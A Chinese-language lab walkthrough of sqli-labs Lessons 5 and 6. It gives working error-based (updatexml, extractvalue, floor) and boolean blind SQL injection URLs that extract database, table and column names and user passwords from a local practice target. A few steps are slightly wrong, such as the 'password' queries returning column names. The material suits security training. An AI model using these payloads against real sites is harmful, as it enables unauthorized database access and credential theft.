Less 5
正常情况,我们构造闭合,发现没有问题
http://127.0.0.1/sqlilabs/Less-5/?id=1'
当我们输入之后,发现 You are in......我们利用前几关的思路
http://127.0.0.1/sqlilabs/Less-5/?id=1' order by 3--+ 回显点为3
查找回显点位置,当前库名
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,2,3--+
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,2,database()--+
发现无论怎么操作都是 You are in......这个时候一般的思路就行不通,猜测是否为其他注入。
尝试 报错注入有以下几种类型。
报错注入的概念:
(1). 通过floor报错 and (select 1 from (select count(*),concat((
payload),floor (rand(0)*2))x from information_schema.tables group by
x)a) 其中payload为你要插入的SQL语句 需要注意的是该语句将 输出字符长度限制为64位
(2). 通过updatexml报错 and updatexml(1, payload,1)
同样该语句对输出的字符长度也做了限制,其最长输出32位
并且该语句对payload的反悔类型也做了限制,只有在payload返回的不是xml格式才会生效(3). 通过extractValue报错 and extractvalue(1, payload) 输出字符有长度限制,最长32位。
0x00 基于updatexml报错
updatexml使用方法 and updatexml(1,padload,1)
获取库名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
十六进制分隔符~ 用0x7e表示
查看表名
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+
爆用户名
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username) from users limit 0,1),0x7e),1)--+
爆密码
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(password) from users limit 0,1),0x7e),1)--+
0x01 基于extractvalue报错
用法 and extractvalue(1,payload)
爆库名
十六进制0x23表示#
http://127.0.0.1/sqlilabs/Less-5/?id=1' and extractvalue(1,concat(0x23,(select database()),0x23))--+
爆表名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x23))--+
爆列名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x23))--+
获取数据
查看用户名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and extractvalue(1,concat(0x23,(select username from users order by id limit 1,1),0x23))--+
查看密码
http://127.0.0.1/sqlilabs/Less-5/?id=1' and extractvalue(1,concat(0x23,(select password from users order by id limit 1,1),0x23))--+
0x02 基于floor报错
count(*):函数返回给定选择中被选的函数
concat():连接字符串,比如 concat(‘a’,’b’) 就是ab
floor():向下取整
rand():随机数函数
rand(0):伪随机数,生成的随机数有规律
floor(rand(0)*2) :生成的随机数存在规律0110110011101floor使用方法 and (select 1 from (select count(),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
floor报错注入满足的条件是数据库中要查询的数据至少3条以上
爆库名
limit 0,1 数据库名为information_schema
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+
limit 1,1 数据库名为challenges
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 1,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+
以此类推。
但有种简便方法一步到位
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((database()),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
爆表名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat(((select concat(table_name) from information_schema.tables where table_schema='security' limit 3,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
爆列名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+
获取信息
用户名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 1,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+
密码
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 2,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+
0x03 布尔盲注
判断当前数据库名称长度
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())<10-- - //显示正常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())<7-- - //显示异常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())<9-- - //显示正常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())=7-- - //显示异常http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())=8-- - //显示正常
说明当前数据库名称长度为8
判断当前数据库名称
以第一个字符为例
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>110-- - //显示正常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>120-- - //显示异常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>115-- - //显示异常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>113-- - //显示正常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>114-- - //显示正常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))=114-- - //显示异常
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))=115-- - //显示正常
对照ascii码表,第一个字母为"s",以此类推...
判断表名长度
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4-- -
表名称
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100-- -
方法类似,这里不一一举例。
但更为便捷的方法还是自行编写脚本,或者使用sqlmap,bp等工具。
Less 6
和第五关一样 只是把'闭合改为"闭合